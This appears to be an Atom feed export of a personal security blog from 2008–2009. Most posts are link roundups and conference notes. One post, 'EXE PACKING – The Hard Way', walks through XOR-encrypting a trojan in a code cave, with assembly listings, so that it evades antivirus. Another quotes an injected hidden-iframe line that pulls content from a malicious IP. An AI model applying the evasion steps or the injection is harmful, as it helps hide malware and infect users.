<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8224460545948081766</id><updated>2012-02-04T00:12:31.692+02:00</updated><title type='text'>Davidi.org</title><subtitle type='html'>"This blog was not opened to the public yet , and probably will not be open ever. If you are a ~public~, please avoid."</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>21</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-3173984569114629641</id><published>2009-01-10T13:17:00.002+02:00</published><updated>2009-01-10T13:25:53.873+02:00</updated><title type='text'>Exploit of the day</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://mad.walla.co.il/archive/170778-5.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 284px; height: 243px;" src="http://mad.walla.co.il/archive/170778-5.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Recantly i have publish a &lt;a href="http://www.hacking.org.il/966"&gt;post &lt;/a&gt;dealing with an old security issue, with all that related to using signature based mechanism  in order to block malware content.&lt;br /&gt;&lt;br /&gt;As mantioned in that article i have used a theoretical tool that might bypass some of the Security Web proxy availble.&lt;br /&gt;&lt;br /&gt;From time to time , i will publish some POC that were produced with that theoretical tool.&lt;br /&gt;&lt;br /&gt;It is strictly written for educational purpose. Use it at&lt;br /&gt;your own risk. Author will not bare any responsibility for any damages watsoever&lt;br /&gt;&lt;br /&gt;See samples &lt;a href="http://www.davidi.org/exploitoftheday"&gt;here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-3173984569114629641?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.davidi.org/exploitoftheday' title='Exploit of the day'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/3173984569114629641'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/3173984569114629641'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2009/01/exploit-of-day.html' title='Exploit of the day'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-6507117246685444204</id><published>2008-08-11T01:47:00.002+03:00</published><updated>2008-08-19T15:04:48.107+03:00</updated><title type='text'>RBN?</title><content type='html'>&lt;a href="http://1.bp.blogspot.com/_8AJZEqJ-sEw/SKq2arWSIAI/AAAAAAAAAdc/3N1FuzhjNQY/s1600-h/code.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_8AJZEqJ-sEw/SKq2arWSIAI/AAAAAAAAAdc/3N1FuzhjNQY/s320/code.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5236198086200664066" /&gt;&lt;/a&gt;&lt;br /&gt;Today i came across with an hacked web site containing some  javascript files pointing to a static IP. The content of the webpage hosted by the infected PCs is an iframe from 91.203.93.4, inserted via javascript like this:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;document.write "-i-frame sr-c=h||p://91.203.93.4/ cgi-bin/index.cgi?ad width=0 height=0 frameborder=0 iframe " ;&lt;br /&gt;&lt;br /&gt;You can read more about it on:&lt;br /&gt;&lt;br /&gt;http://www.matchent.com/wpress/index.php?q=comment/reply/365&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-6507117246685444204?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/6507117246685444204'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/6507117246685444204'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2008/08/rbn.html' title='RBN?'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_8AJZEqJ-sEw/SKq2arWSIAI/AAAAAAAAAdc/3N1FuzhjNQY/s72-c/code.JPG' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-3482987077906334162</id><published>2008-08-07T20:50:00.011+03:00</published><updated>2008-08-07T21:03:12.928+03:00</updated><title type='text'>The  FaceBook virus / worm</title><content type='html'>&lt;a href="http://1.bp.blogspot.com/_8AJZEqJ-sEw/SJs3zuipQ6I/AAAAAAAAAdU/sHqTgNEo8i8/s1600-h/fb4.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_8AJZEqJ-sEw/SJs3zuipQ6I/AAAAAAAAAdU/sHqTgNEo8i8/s200/fb4.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5231836753927160738" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_8AJZEqJ-sEw/SJs3XJ5gPlI/AAAAAAAAAdM/HwBfHMGEToU/s1600-h/fb3.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://2.bp.blogspot.com/_8AJZEqJ-sEw/SJs3XJ5gPlI/AAAAAAAAAdM/HwBfHMGEToU/s200/fb3.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5231836263054589522" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_8AJZEqJ-sEw/SJs2lAnDYII/AAAAAAAAAdE/VsTtlK-zTck/s1600-h/fb2.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_8AJZEqJ-sEw/SJs2lAnDYII/AAAAAAAAAdE/VsTtlK-zTck/s200/fb2.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5231835401567821954" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_8AJZEqJ-sEw/SJs2SCqlpdI/AAAAAAAAAc8/NgIm5BQIL1Q/s1600-h/fb1.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_8AJZEqJ-sEw/SJs2SCqlpdI/AAAAAAAAAc8/NgIm5BQIL1Q/s200/fb1.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5231835075702007250" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;---------- Today i so 2 strange mesages from my facebook friends.&lt;br /&gt;&lt;br /&gt;- both of them were the same, and i remember that i so an article today about a facebook virus/worm.&lt;br /&gt;&lt;br /&gt;- The link directed me to the code in the image, that linked to download a worm.&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-3482987077906334162?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/3482987077906334162/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=3482987077906334162' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/3482987077906334162'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/3482987077906334162'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2008/08/i-got-facebook-virus.html' title='The  FaceBook virus / worm'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_8AJZEqJ-sEw/SJs3zuipQ6I/AAAAAAAAAdU/sHqTgNEo8i8/s72-c/fb4.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-8445435863903945137</id><published>2008-07-02T03:13:00.004+03:00</published><updated>2008-07-02T12:18:42.673+03:00</updated><title type='text'>BlackHat USA 2008</title><content type='html'>&lt;a href="http://bp3.blogger.com/_8AJZEqJ-sEw/SGs84RexxDI/AAAAAAAAAc0/EoUxvLGYK3U/s1600-h/bh.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_8AJZEqJ-sEw/SGs84RexxDI/AAAAAAAAAc0/EoUxvLGYK3U/s200/bh.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5218331530701685810" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Coming soon, in August 2-7, Las Vegas, USA&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;The Black Hat Briefings return to the venerable Caesars Palace Hotel and Casino for another installment of the premier North American technical information security conference.&lt;br /&gt;&lt;br /&gt;Every year the lineup of presentations helps define the security headlines for the following year and 2008 will be no exception."&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Last year, as was published in my blog before, I met some great Israeli security researchers on the conference, which I was more than proud to learn from and share knowledge. &lt;br /&gt;&lt;br /&gt;One of them was &lt;a href="http://aviv.raffon.net/"&gt;Aviv Raff &lt;/a&gt;which also lectured there on the Defcon &lt;a href="http://defcon.org/html/defcon-15/dc-15-speakers.html#Raff"&gt;summit&lt;/a&gt;, and will probably be there this year, and hopefully share some of his thoughts "live".&lt;br /&gt;&lt;br /&gt;This year, we will be honored also to get notes, remarks and overall description from another security specialist, &lt;a href="http://www.reshet.tv/video.aspx?video_id=7707"&gt;Jacky Altal&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-8445435863903945137?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.blackhat.com/' title='BlackHat USA 2008'/><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/8445435863903945137/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=8445435863903945137' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/8445435863903945137'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/8445435863903945137'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2008/07/blackhat-usa-2008.html' title='BlackHat USA 2008'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_8AJZEqJ-sEw/SGs84RexxDI/AAAAAAAAAc0/EoUxvLGYK3U/s72-c/bh.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-5087603736570692253</id><published>2008-06-30T04:09:00.004+03:00</published><updated>2008-06-30T17:50:53.632+03:00</updated><title type='text'>EXE PACKING – The Hard Way</title><content type='html'>&lt;a href="http://3.bp.blogspot.com/_8AJZEqJ-sEw/SGjhcoGS2uI/AAAAAAAAAck/p781dfM9QTM/s1600-h/j2.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_8AJZEqJ-sEw/SGjhcoGS2uI/AAAAAAAAAck/p781dfM9QTM/s320/j2.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5217668050225126114" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;By Jacky Altal&lt;/strong&gt; &lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Manual packing an application is an important procedure that can be done easily. There are many reasons to pack an application file, for example to secure it from functionality modifications or any other malicious attacks.  Hackers use this method to inject malicious code into applications in order to camouflage harmful code.&lt;br /&gt;&lt;br /&gt;Another good use for manual packing would be to bypass Anti Virus software and make arbitrary malicious code to become AV`s best friend.  &lt;br /&gt;&lt;br /&gt;Firstly, the entire table section (.text, .date, .rsrc) needs to be encrypted. Alternatively, if the location of the virus signature is known, then only the specific bytes require encrypting. Then it is stored in an unencrypted cave area. A small XOR function needs to be coded to encrypt the code and save to a file.&lt;br /&gt;&lt;br /&gt;Once the file is encrypted, it needs to be executed again and the XOR function will run first.  This time, the code will be decrypted back to its original state and the file will run in real-time unrecognizable by the anti-virus.&lt;br /&gt;What is XOR function&lt;br /&gt;XOR, also known as Exclusive OR, is a bitwise operator from binary mathematics. The XOR operator returns a 1 when the value of either the first bit or the second bit is a 1. The XOR operator returns a 0 when neither or both of the bits is 1.&lt;br /&gt;This is best illustrated in the following chart:&lt;br /&gt;F.bit S.bit Result&lt;br /&gt;F F F&lt;br /&gt;F T T&lt;br /&gt;T F T&lt;br /&gt;T T F&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The XOR operator is used to "flip" bits (zeroes and ones) in a piece of plaintext to create a cipher text. In other words, if the code section is XORed twice with the same key, it will return to its original state.&lt;br /&gt;&lt;br /&gt;Entry Point  &lt;---&lt;br /&gt;             jump to encrypt/cave code&lt;br /&gt;&lt;br /&gt;Code Cave  &lt;---&lt;br /&gt;             XOR function encrypt/decrypt&lt;br /&gt;&lt;br /&gt;End Cave    &lt;---&lt;br /&gt;&lt;br /&gt;Replace Entry Point with a JMP to the crypto routine, Insert the crypto routine into the code cave, then insert the deleted command (the one that was deleted) and then go back to the original coded entry command after the hooked entry command has executed.&lt;br /&gt;&lt;br /&gt;The crypto code needs to be run once in order to encrypt the entire section and then it needs to be saved to a file.  The next time that the file is run, the crypto routine will decrypt the code section back to its original state.&lt;br /&gt;&lt;br /&gt;Tools&lt;br /&gt;&lt;br /&gt;Infected exe (Trojan)&lt;br /&gt;Ollydbg &lt;br /&gt;LordPE&lt;br /&gt;&lt;br /&gt;Hands On&lt;br /&gt;&lt;br /&gt;Open up your infected file with Ollydbg and copy the first few commands (backup the commands to a text file). Mark the first few lines and right click copy to clipboard and paste it into a text file. &lt;br /&gt;&lt;br /&gt;-=:Entry Code:=-&lt;br /&gt;&lt;br /&gt;00401219 &gt;/$ 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]&lt;br /&gt;0040121F  |. 55                          PUSH EBP&lt;br /&gt;00401220  |. 89E5                     MOV EBP,ESP&lt;br /&gt;00401222  |. 6A FF                   PUSH -1&lt;br /&gt;&lt;br /&gt;Go to the end of the file and look for DB 00 in the code cave (at the end of the file) and first try to write to that area. If the section is writeable then you are set and you don’t need to change the section permissions.&lt;br /&gt;&lt;br /&gt;-=:Cave Code:=-&lt;br /&gt;&lt;br /&gt;0040E4FD     0000           ADD BYTE PTR DS:[EAX],AL&lt;br /&gt;0040E4FF     0000           ADD BYTE PTR DS:[EAX],AL&lt;br /&gt;0040E501     0000           ADD BYTE PTR DS:[EAX],AL&lt;br /&gt;0040E503     0000           ADD BYTE PTR DS:[EAX],AL&lt;br /&gt;&lt;br /&gt;If you receive an error message it means that this area is protected, and we will need to modify the PE section to allow us to write to this area. It can be easily done with LordPE (edit the section properties).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;Open up LordPE, load your file and click on the Section button. Once done, right click the data section and choose the properties window. Click the checkboxes to make the file writeable and executable. The file is done.&lt;br /&gt;&lt;br /&gt;The following routine will be used to XOR the data section. Actually, this is a simple encryption routine that will start to XOR every byte from the data section (@0040129c) with our key (0f). The loop will stop at the end of the data section (@0040E46C).&lt;br /&gt;&lt;br /&gt;Encryption Routine&lt;br /&gt;mov eax,0040129c&lt;br /&gt;xor byte [eax],0f&lt;br /&gt;inc eax&lt;br /&gt;cmp eax,0040E46C&lt;br /&gt;jle [xor address]&lt;br /&gt;&lt;br /&gt;Deleted Call&lt;br /&gt;00401219 &gt;/$ 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]&lt;br /&gt;0040121F  |. 55                          PUSH EBP&lt;br /&gt;&lt;br /&gt;Jump back to application flow&lt;br /&gt;00401219 &gt;   E9 E2D20000    JMP finish1t.0040E500&lt;br /&gt;0040121E     90             NOP&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;The final code should look like the following:&lt;br /&gt;&lt;br /&gt;XOR Loop + Deleted Call + Jump back to application flow.&lt;br /&gt;&lt;br /&gt;Code Cave:&lt;br /&gt;0040E500     B8 9C124000    MOV EAX,finish1t.0040129C                ;  Entry address&lt;br /&gt;0040E505     8030 0F           XOR BYTE PTR DS:[EAX],0F&lt;br /&gt;0040E508     0                     INC EAX&lt;br /&gt;0040E509   3D  6CE44000   CMP EAX,&lt;JMP.&amp;CRTDLL.wctomb&gt;;  Entry address&lt;br /&gt;0040E50E   7E F5               JLE SHORT finish1t.0040E505&lt;br /&gt;0040E510   64:A1 00000000 MOV EAX,DWORD PTR FS:[0]&lt;br /&gt;0040E516   E9 042DFFFF    JMP finish1t.0040121F&lt;br /&gt;&lt;br /&gt;Now, Lets put a break point at the end of the loop; line 0040e510 and execute the code. Once the execution stops, save the file and exit ollydbg.&lt;br /&gt;&lt;br /&gt;00401219 &gt;/$ 64:A1 00000000 JMP finish1t. 0040E500&lt;br /&gt;&lt;br /&gt;Last but not least, double check that you changed the application flows to jump to the cave code address.&lt;br /&gt; &lt;br /&gt;The file is unrecognized by the antivirus software now.  File is ready.&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-5087603736570692253?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/5087603736570692253/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=5087603736570692253' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/5087603736570692253'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/5087603736570692253'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2008/06/exe-packing-hard-way.html' title='EXE PACKING – The Hard Way'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_8AJZEqJ-sEw/SGjhcoGS2uI/AAAAAAAAAck/p781dfM9QTM/s72-c/j2.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-8024647383550288541</id><published>2008-02-29T14:03:00.013+02:00</published><updated>2008-06-30T16:34:30.421+03:00</updated><title type='text'>Security Risk Management PPT</title><content type='html'>&lt;a href="http://www.esgulf.com/images/seta-academy.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 320px;" src="http://www.esgulf.com/images/seta-academy.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Download Security Risk Management MS PPT  &lt;a href="download.microsoft.com/documents/australia/security/summit/presentations/Security_Risk_Management.ppt"&gt;here &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Download Security Risk Management OCTAVE PPT &lt;br /&gt;&lt;a href="http://www.google.co.il/search?hl=iw&amp;as_qdr=all&amp;q=risk+assessment+filetype%3Appt+information+security+OCTAVE+&amp;btnG=%D7%97%D7%99%D7%A4%D7%95%D7%A9&amp;meta="&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Download Security Risk Management  SCADA PPT&lt;br /&gt; &lt;a href="http://www.google.co.il/search?hl=iw&amp;as_qdr=all&amp;q=risk+assessment+filetype%3Appt+information+security+scada+&amp;meta="&gt;here &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Download&lt;br /&gt; Security Risk Management  COBRA PPT &lt;br /&gt;&lt;a href="http://www.google.co.il/search?hl=iw&amp;as_qdr=all&amp;q=risk+assessment+filetype%3Appt+information+security+COBRA&amp;btnG=%D7%97%D7%99%D7%A4%D7%95%D7%A9&amp;meta="&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Many PPT on Risk assessment can be found &lt;a href="http://www.google.co.il/search?hl=iw&amp;as_qdr=all&amp;q=risk+assessment+filetype%3Appt+information+security+&amp;meta="&gt;here&lt;/a&gt; and on Risk managment &lt;a href="http://www.google.co.il/search?hl=iw&amp;as_qdr=all&amp;q=risk+managment+filetype%3Appt+information+security+&amp;meta="&gt;here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-8024647383550288541?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/8024647383550288541/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=8024647383550288541' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/8024647383550288541'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/8024647383550288541'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2008/02/security-risk-management-ms-ppt.html' title='Security Risk Management PPT'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-7566181468326817146</id><published>2008-02-14T15:42:00.003+02:00</published><updated>2008-02-14T15:48:58.739+02:00</updated><title type='text'>The Threats and Countermeasures Guide</title><content type='html'>&lt;a href="http://www.netlaw.co.il/uploads/hackers/1046277.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px;" src="http://www.netlaw.co.il/uploads/hackers/1046277.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Brief Description&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Security Settings in Windows Server 2003 and Windows XP&lt;br /&gt;The Threats and Countermeasures guide provides you with a reference to all security settings that provide countermeasures for specific threats against current versions of the Microsoft® Windows® operating systems&lt;br /&gt;&lt;br /&gt;Download the guied &lt;a href="http://go.microsoft.com/fwlink/?LinkId=15160"&gt;here &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This guide is a companion for two other publications that are available from Microsoft:&lt;br /&gt;&lt;br /&gt;• Windows Server 2003 Security Guide, available online at&lt;br /&gt;http://go.microsoft.com/fwlink/?LinkId=14845&lt;br /&gt; &lt;br /&gt;• Windows XP Security Guide, available online at&lt;br /&gt;http://go.microsoft.com/fwlink/?LinkId=14839&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-7566181468326817146?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://go.microsoft.com/fwlink/?LinkId=15160' title='The Threats and Countermeasures Guide'/><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/7566181468326817146/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=7566181468326817146' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/7566181468326817146'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/7566181468326817146'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2008/02/threats-and-countermeasures-guide.html' title='The Threats and Countermeasures Guide'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-3664474148852605422</id><published>2008-02-14T13:43:00.005+02:00</published><updated>2008-06-30T16:40:14.597+03:00</updated><title type='text'>Additional useful info while Assessing Risk</title><content type='html'>&lt;a href="http://www.foundstone.com/us/images/education/ps_riskassess.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px;" src="http://www.foundstone.com/us/images/education/ps_riskassess.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Asset Classes&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;For additional information on defining and categorizing information and information systems, refer to National Institute of Standards and Technology (NIST) Special Publication 800-60 workshops, "Mapping Types of Information and Information Systems to Security Categories," and the Federal Information Processing Standards (FIPS) publication 199, "Security Categorization of Federal Information and Information Systems."&lt;br /&gt;&lt;br /&gt;for "Common Information System Assets" http://www.microsoft.com/technet/security/guidance/complianceandpolicies/secrisk/srappb.mspx&lt;br /&gt;&lt;br /&gt;for "Common Threats"&lt;br /&gt;http://www.microsoft.com/technet/security/guidance/complianceandpolicies/secrisk/srappc.mspx&lt;br /&gt;&lt;br /&gt;for examples of "Vulnerabilities"&lt;br /&gt;http://www.microsoft.com/technet/security/guidance/complianceandpolicies/secrisk/srappd.mspx&lt;div class="blogger-post-footer"&gt;www.davidi.org&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8224460545948081766-3664474148852605422?l=davidiorg.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://davidiorg.blogspot.com/feeds/3664474148852605422/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8224460545948081766&amp;postID=3664474148852605422' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/3664474148852605422'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8224460545948081766/posts/default/3664474148852605422'/><link rel='alternate' type='text/html' href='http://davidiorg.blogspot.com/2008/02/additional-useful-info-while-assessing.html' title='Additional useful info while Assessing Risk'/><author><name>Amir Davidi</name><uri>http://www.blogger.com/profile/02404144649222267559</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8224460545948081766.post-8454070562328624498</id><published>2008-02-14T10:41:00.004+02:00</published><updated>2008-02-14T10:53:38.344+02:00</updated><title type='text'>More info on  Security Risk Management</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://img.microsoft.com/library/media/1033/technet/images/security/topics/complianceandpolicies/secrisk/overvi01.gif"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px;" src="http://img.microsoft.com/library/media/1033/technet/images/security/topics/complianceandpolicies/secrisk/overvi01.gif" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br 